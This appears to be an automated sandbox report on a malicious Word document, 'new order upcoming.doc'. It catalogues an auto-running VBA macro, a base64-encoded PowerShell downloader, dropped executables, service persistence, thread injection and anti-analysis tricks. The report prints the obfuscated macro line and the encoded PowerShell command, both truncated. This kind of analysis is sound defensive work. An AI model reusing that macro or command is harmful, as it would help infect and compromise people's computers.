Source: C:\Windows\System32\wlangdi.exe | Code function: lstrcmpiW,memset,memset,SHFileOperationW,GetTempPathW,GetTempFileNameW,SHFileOperationW,SHFileOperationW,OpenSCManagerW,CreateServiceW,OpenServiceW,EnumServicesStatusExW,GetLastError,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusExW,OpenServiceW,QueryServiceConfig2W,GetLastError,GetProcessHeap,RtlAllocateHeap,QueryServiceConfig2W,GetProcessHeap,HeapFree,CloseServiceHandle,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetProcessHeap,HeapFree,StartServiceW,CloseServiceHandle,CloseServiceHandle,memset,CreateProcessW,CloseHandle,CloseHandle,7_2_002E8ABC
Source: C:\Windows\System32\QYIyP.exe | Code function: lstrcmpiW,memset,memset,SHFileOperationW,GetTempPathW,GetTempFileNameW,SHFileOperationW,SHFileOperationW,OpenSCManagerW,CreateServiceW,OpenServiceW,EnumServicesStatusExW,GetLastError,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusExW,OpenServiceW,QueryServiceConfig2W,GetLastError,GetProcessHeap,RtlAllocateHeap,QueryServiceConfig2W,GetProcessHeap,HeapFree,CloseServiceHandle,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetProcessHeap,HeapFree,StartServiceW,CloseServiceHandle,CloseServiceHandle,memset,CreateProcessW,CloseHandle,CloseHandle,9_2_00A08ABC
Contains functionality to enum processes or threads
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 4_2_004F8197 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,lstrlenW,GetProcessHeap,RtlAllocateHeap,lstrcmpiW,lstrcpyW,lstrlenW,GetProcessHeap,HeapFree,4_2_004F8197
Contains functionality to modify services (start/stop/modify)
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 5_2_003E8ABC lstrcmpiW,memset,memset,SHFileOperationW,GetTempPathW,GetTempFileNameW,SHFileOperationW,SHFileOperationW,OpenSCManagerW,CreateServiceW,OpenServiceW,EnumServicesStatusExW,GetLastError,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusExW,OpenServiceW,QueryServiceConfig2W,GetLastError,GetProcessHeap,RtlAllocateHeap,QueryServiceConfig2W,GetProcessHeap,HeapFree,CloseServiceHandle,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetProcessHeap,HeapFree,StartServiceW,CloseServiceHandle,CloseServiceHandle,memset,CreateProcessW,CloseHandle,CloseHandle,5_2_003E8ABC
Creates files inside the program directory
Source: C:\Windows\System32\wlangdi.exe | File created: C:\ProgramData\FDF4.tmp
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$w order upcoming.doc
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\HERBBL~1\AppData\Local\Temp\CVR2623.tmp
Document contains an OLE Word Document stream indicating a Microsoft Word file
Source: new order upcoming.doc | OLE indicator, Word Document stream: true
Document contains summary information with irregular field values
Source: new order upcoming.doc | OLE document summary: title field not present or empty
Source: new order upcoming.doc | OLE document summary: edited time not present or 0
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Queries a list of all open handles
Source: C:\Windows\System32\wlangdi.exe | System information queried: HandleInformation
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
SQL strings found in memory and binary data
Source: wlangdi.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wlangdi.exe | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: wlangdi.exe | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wlangdi.exe | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wlangdi.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wlangdi.exe | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wlangdi.exe | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Sample is known by Antivirus (Virustotal or Metascan)
Source: new order upcoming.doc | Virustotal: hash found
Spawns processes
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\new order upcoming.doc'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERShell -e WwBzAHQAUgBJAG4ARwBdADoAOgBKAE8AaQBuACgAIAAnACcALAAoACgAIAAzADYAIAAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkALAAgADEAMQA0ACAALAAxADAANQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsADMAMgAsACAANgAxACAALAAgADMAMgAsACAAMQAxADAALAAgADEAMAAxACAALAAxADEAOQAsACAANAA1ACAALAAgADEAMQAxACwAIAA5ADgAIAAsACAAMQAwADYAIAAsACAAMQAwADEAIAAsACAAOQA5ACAALAAxADEANgAgACwAIAAzADIAIAAsACAANAA1ACAALAA2ADcALAAxADEAMQAsADEAMAA5ACwAIAA3ADkALAAgADkAOAAsACAAMQAwADYALAAgADEAMAAxACAALAAgADkAOQAgACwAIAAxADEANgAsADMAMgAsACAAOAA3ACAALAAgADgAMwAsACAAOQA5ACAALAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADIALAAxADEANgAgACwAIAA0ADYALAA4ADMAIAAsACAAMQAwADQAIAAsACAAMQAwADEALAAxADAAOAAgACwAIAAxADAAOAAsADUAOQAgACwAMwA2ACwAIAAxADEAOQAgACwAMQAwADEALAA5ADgAIAAsACAAOQA5ACwAIAAxADAAOAAgACwAIAAxADAANQAgACwAMQAwADEALAAgADEAMQAwACAALAAgADEAMQA2ACwAMwAyACAALAAgADYAMQAgACwAMwAyACwAIAAxADEAMAAsACAAMQAwADEALAAxADEAOQAsADQANQAgACwAIAAxADEAMQAsACAAOQA4ACAALAAxADAANgAgACwAMQAwADEAIAAsACAAOQA5ACAALAAgADEAMQA2ACwAMwAyACAAL
Source: unknown | Process created: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe 'C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe'
Source: unknown | Process created: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe
Source: unknown | Process created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: unknown | Process created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: unknown | Process created: C:\Windows\System32\QYIyP.exe C:\Windows\system32\QYIyP.exe
Source: unknown | Process created: C:\Windows\System32\QYIyP.exe C:\Windows\system32\QYIyP.exe
Source: unknown | Process created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: unknown | Process created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: unknown | Process created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' /scomma 'C:\ProgramData\FDF4.tmp'
Source: unknown | Process created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' /scomma 'C:\ProgramData\FDF5.tmp'
Source: unknown | Process created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' 'C:\ProgramData\FDF6.tmp'
Source: unknown | Process created: C:\Windows\System32\wbem\WmiApSrv.exe C:\Windows\system32\wbem\WmiApSrv.exe
Source: unknown | Process created: C:\Windows\System32\wbem\WmiApSrv.exe C:\Windows\system32\wbem\WmiApSrv.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERShell -e WwBzAHQAUgBJAG4ARwBdADoAOgBKAE8AaQBuACgAIAAnACcALAAoACgAIAAzADYAIAAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkALAAgADEAMQA0ACAALAAxADAANQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsADMAMgAsACAANgAxACAALAAgADMAMgAsACAAMQAxADAALAAgADEAMAAxACAALAAxADEAOQAsACAANAA1ACAALAAgADEAMQAxACwAIAA5ADgAIAAsACAAMQAwADYAIAAsACAAMQAwADEAIAAsACAAOQA5ACAALAAxADEANgAgACwAIAAzADIAIAAsACAANAA1ACAALAA2ADcALAAxADEAMQAsADEAMAA5ACwAIAA3ADkALAAgADkAOAAsACAAMQAwADYALAAgADEAMAAxACAALAAgADkAOQAgACwAIAAxADEANgAsADMAMgAsACAAOAA3ACAALAAgADgAMwAsACAAOQA5ACAALAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADIALAAxADEANgAgACwAIAA0ADYALAA4ADMAIAAsACAAMQAwADQAIAAsACAAMQAwADEALAAxADAAOAAgACwAIAAxADAAOAAsADUAOQAgACwAMwA2ACwAIAAxADEAOQAgACwAMQAwADEALAA5ADgAIAAsACAAOQA5ACwAIAAxADAAOAAgACwAIAAxADAANQAgACwAMQAwADEALAAgADEAMQAwACAALAAgADEAMQA2ACwAMwAyACAALAAgADYAMQAgACwAMwAyACwAIAAxADEAMAAsACAAMQAwADEALAAxADEAOQAsADQANQAgACwAIAAxADEAMQAsACAAOQA4ACAALAAxADAANgAgACwAMQAwADEAIAAsACAAOQA5ACAALAAgADEAMQA2ACwAMwAyACAAL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe 'C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe'
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Process created: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe
Source: C:\Windows\System32\wlangdi.exe | Process created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: C:\Windows\System32\wlangdi.exe | Process created: C:\Windows\System32\QYIyP.exe C:\Windows\system32\QYIyP.exe
Source: C:\Windows\System32\QYIyP.exe | Process created: C:\Windows\System32\QYIyP.exe C:\Windows\system32\QYIyP.exe
Source: C:\Windows\System32\wlangdi.exe | Process created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: C:\Windows\System32\wlangdi.exe | Process created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' /scomma 'C:\ProgramData\FDF4.tmp'
Source: C:\Windows\System32\wlangdi.exe | Process created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' 'C:\ProgramData\FDF6.tmp'
Source: C:\Windows\System32\wlangdi.exe | Process created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' /scomma 'C:\ProgramData\FDF5.tmp'
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32
Contains functionality to launch a process as a different user
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 5_2_003E20A9 memset,CreateProcessAsUserW,CreateProcessW,5_2_003E20A9
Creates files inside the system directory
Source: C:\Windows\System32\wlangdi.exe | File created: C:\Windows\system32\QYIyP.exe
Creates mutexes
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\M1621D35E
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Mutant created: \Sessions\1\BaseNamedObjects\M9700BF63
Source: C:\Windows\System32\wlangdi.exe | Mutant created: \BaseNamedObjects\Global\I1621D35E
Source: C:\Windows\System32\QYIyP.exe | Mutant created: \BaseNamedObjects\MAC7BE04C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\I1621D35E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\wlangdi.exe | Mutant created: \BaseNamedObjects\M20A03E5E
Document contains an embedded VBA macro which reads document properties (may be used for disguise)
Source: new order upcoming.doc | OLE, VBA macro line: vba.shell$ "" + hgrrdtcwnfx + gugydafkr + lntbabdw + uzfpbzsbduh + ryfawrsecf + dnkhhvry + activedocument.builtindocumentproperties("co" + "mments") + hgrrdtcwnfx + gugydafkr + lntbabdw + uzfpbzsbduh + ryfawrsecf + dnkhhvry + frdsdgytpw, 0
Document contains embedded VBA macros
Source: new order upcoming.doc | OLE indicator, VBA macros: true
Reads the hosts file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wlangdi.exe | File read: C:\Windows\System32\drivers\etc\hosts
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: new order upcoming.doc | OLE, VBA macro line: Sub autoopen()
Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function autoopen | Name: autoopen
Document contains an embedded VBA macro which may execute processes
Source: new order upcoming.doc | OLE, VBA macro line: VBA.Shell$ "" + HgrrDtcWNfx + gUgyDafKR + LNtbaBDw + UZfPbzsbDuH + RYFaWrSEcf + DnKhHvRY + ActiveDocument.BuiltInDocumentProperties("Co" + "mments") + HgrrDtcWNfx + gUgyDafKR + LNtbaBDw + UZfPbzsbDuH + RYFaWrSEcf + DnKhHvRY + fRDSDGyTPw, 0
Very long command line found
Source: unknown | Process created: Commandline size = 6498
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: Commandline size = 6498

HIPS / PFW / Operating System Protection Evasion:

Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERShell -e WwBzAHQAUgBJAG4ARwBdADoAOgBKAE8AaQBuACgAIAAnACcALAAoACgAIAAzADYAIAAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkALAAgADEAMQA0ACAALAAxADAANQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsADMAMgAsACAANgAxACAALAAgADMAMgAsACAAMQAxADAALAAgADEAMAAxACAALAAxADEAOQAsACAANAA1ACAALAAgADEAMQAxACwAIAA5ADgAIAAsACAAMQAwADYAIAAsACAAMQAwADEAIAAsACAAOQA5ACAALAAxADEANgAgACwAIAAzADIAIAAsACAANAA1ACAALAA2ADcALAAxADEAMQAsADEAMAA5ACwAIAA3ADkALAAgADkAOAAsACAAMQAwADYALAAgADEAMAAxACAALAAgADkAOQAgACwAIAAxADEANgAsADMAMgAsACAAOAA3ACAALAAgADgAMwAsACAAOQA5ACAALAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADIALAAxADEANgAgACwAIAA0ADYALAA4ADMAIAAsACAAMQAwADQAIAAsACAAMQAwADEALAAxADAAOAAgACwAIAAxADAAOAAsADUAOQAgACwAMwA2ACwAIAAxADEAOQAgACwAMQAwADEALAA5ADgAIAAsACAAOQA5ACwAIAAxADAAOAAgACwAIAAxADAANQAgACwAMQAwADEALAAgADEAMQAwACAALAAgADEAMQA2ACwAMwAyACAALAAgADYAMQAgACwAMwAyACwAIAAxADEAMAAsACAAMQAwADEALAAxADEAOQAsADQANQAgACwAIAAxADEAMQAsACAAOQA4ACAALAAxADAANgAgACwAMQAwADEAIAAsACAAOQA5ACAALAAgADEAMQA2ACwAMwAyACAAL
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERShell -e WwBzAHQAUgBJAG4ARwBdADoAOgBKAE8AaQBuACgAIAAnACcALAAoACgAIAAzADYAIAAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkALAAgADEAMQA0ACAALAAxADAANQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsADMAMgAsACAANgAxACAALAAgADMAMgAsACAAMQAxADAALAAgADEAMAAxACAALAAxADEAOQAsACAANAA1ACAALAAgADEAMQAxACwAIAA5ADgAIAAsACAAMQAwADYAIAAsACAAMQAwADEAIAAsACAAOQA5ACAALAAxADEANgAgACwAIAAzADIAIAAsACAANAA1ACAALAA2ADcALAAxADEAMQAsADEAMAA5ACwAIAA3ADkALAAgADkAOAAsACAAMQAwADYALAAgADEAMAAxACAALAAgADkAOQAgACwAIAAxADEANgAsADMAMgAsACAAOAA3ACAALAAgADgAMwAsACAAOQA5ACAALAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADIALAAxADEANgAgACwAIAA0ADYALAA4ADMAIAAsACAAMQAwADQAIAAsACAAMQAwADEALAAxADAAOAAgACwAIAAxADAAOAAsADUAOQAgACwAMwA2ACwAIAAxADEAOQAgACwAMQAwADEALAA5ADgAIAAsACAAOQA5ACwAIAAxADAAOAAgACwAIAAxADAANQAgACwAMQAwADEALAAgADEAMQAwACAALAAgADEAMQA2ACwAMwAyACAALAAgADYAMQAgACwAMwAyACwAIAAxADEAMAAsACAAMQAwADEALAAxADEAOQAsADQANQAgACwAIAAxADEAMQAsACAAOQA4ACAALAAxADAANgAgACwAMQAwADEAIAAsACAAOQA5ACAALAAgADEAMQA2ACwAMwAyACAAL
Encrypted powershell cmdline option found
Source: unknownProcess created: Base64 decoded [stRInG]::JOin( '',(( 36 , 119 ,115, 99, 114 ,105 , 112 ,116 ,32, 61 , 32, 110, 101 ,119, 45 , 111, 98 , 106 , 101 , 99 ,116 , 32 , 45 ,67,111,109, 79, 98, 106, 101 , 99 , 116,32, 87 , 83, 99 ,114, 105 , 112,116 , 46,83 , 104 , 101,108 , 108,59 ,36, 119 ,101,98 , 99, 108 , 105 ,101, 110 , 116,32 , 61 ,32, 110, 101,119,45 , 111, 98 ,106 ,101 , 99 , 116,32 ,83 ,121, 115 ,116 ,101 , 109 , 46, 78,101, 116 ,46,87 ,101 ,98 , 67 , 108, 105 , 101 , 110,116 , 59, 36, 114 ,97,110,100, 111 , 109, 32, 61 ,32 , 1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: Base64 decoded [stRInG]::JOin( '',(( 36 , 119 ,115, 99, 114 ,105 , 112 ,116 ,32, 61 , 32, 110, 101 ,119, 45 , 111, 98 , 106 , 101 , 99 ,116 , 32 , 45 ,67,111,109, 79, 98, 106, 101 , 99 , 116,32, 87 , 83, 99 ,114, 105 , 112,116 , 46,83 , 104 , 101,108 , 108,59 ,36, 119 ,101,98 , 99, 108 , 105 ,101, 110 , 116,32 , 61 ,32, 110, 101,119,45 , 111, 98 ,106 ,101 , 99 , 116,32 ,83 ,121, 115 ,116 ,101 , 109 , 46, 78,101, 116 ,46,87 ,101 ,98 , 67 , 108, 105 , 101 , 110,116 , 59, 36, 114 ,97,110,100, 111 , 109, 32, 61 ,32 , 1
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\wlangdi.exe | Thread register set: target process: 3592

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory allocated: page read and write and page guard
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | System information queried: KernelDebuggerInformation
Contains functionality to dynamically determine API calls
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 4_2_004F1D8F VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,4_2_004F1D8F
Contains functionality to read the PEB
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 4_2_004F1B03 mov eax, dword ptr fs:[00000030h] 4_2_004F1B03
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 5_2_003E1B03 mov eax, dword ptr fs:[00000030h] 5_2_003E1B03
Source: C:\Windows\System32\wlangdi.exe | Code function: 6_2_002E1B03 mov eax, dword ptr fs:[00000030h] 6_2_002E1B03
Source: C:\Windows\System32\wlangdi.exe | Code function: 7_2_002E1B03 mov eax, dword ptr fs:[00000030h] 7_2_002E1B03
Source: C:\Windows\System32\QYIyP.exe | Code function: 8_2_00511B03 mov eax, dword ptr fs:[00000030h] 8_2_00511B03
Source: C:\Windows\System32\QYIyP.exe | Code function: 9_2_00A01B03 mov eax, dword ptr fs:[00000030h] 9_2_00A01B03
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 4_2_004F924D EntryPoint,GetProcessHeap,RtlAllocateHeap,memset,GetProcessHeap,HeapFree,ExitProcess,4_2_004F924D
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

Malware Analysis System Evasion:

Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Checks the free space of harddrives
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\QYIyP.exe | File Volume queried: C:\ FullSizeInformation
Contains long sleeps (>= 3 min)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Thread delayed: delay time: 200
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
Found large amount of non-executed APIs
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | API coverage: 7.5 %
Source: C:\Windows\System32\wlangdi.exe | API coverage: 6.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224 | Thread sleep time: -120000s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3204 | Thread sleep time: -922337203685477s >= -60s
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe TID: 3308 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wlangdi.exe TID: 3368 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\QYIyP.exe TID: 3440 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wlangdi.exe TID: 3512 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wlangdi.exe TID: 3596 | Thread sleep time: -5000s >= -60s
Source: C:\Windows\System32\wlangdi.exe TID: 3604 | Thread sleep time: -500s >= -60s
Source: C:\Windows\System32\wbem\WmiApSrv.exe TID: 3896 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wbem\WmiApSrv.exe TID: 3960 | Thread sleep time: -120000s >= -60s
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\System32\QYIyP.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess | graph_8-9703
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess | graph_4-9298
Source: C:\Windows\System32\wlangdi.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess | graph_6-9956

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exe | Process information set: FAILCRITICALERRORS and NOOPENFILEERRORBOX
Document contains OLE streams with high entropy indicating encrypted embedded content
Source: new order upcoming.doc | Stream path 'Data' entropy: 7.98881108447 (max. 8.0)
System process connects to network (likely due to code injection or exploit)
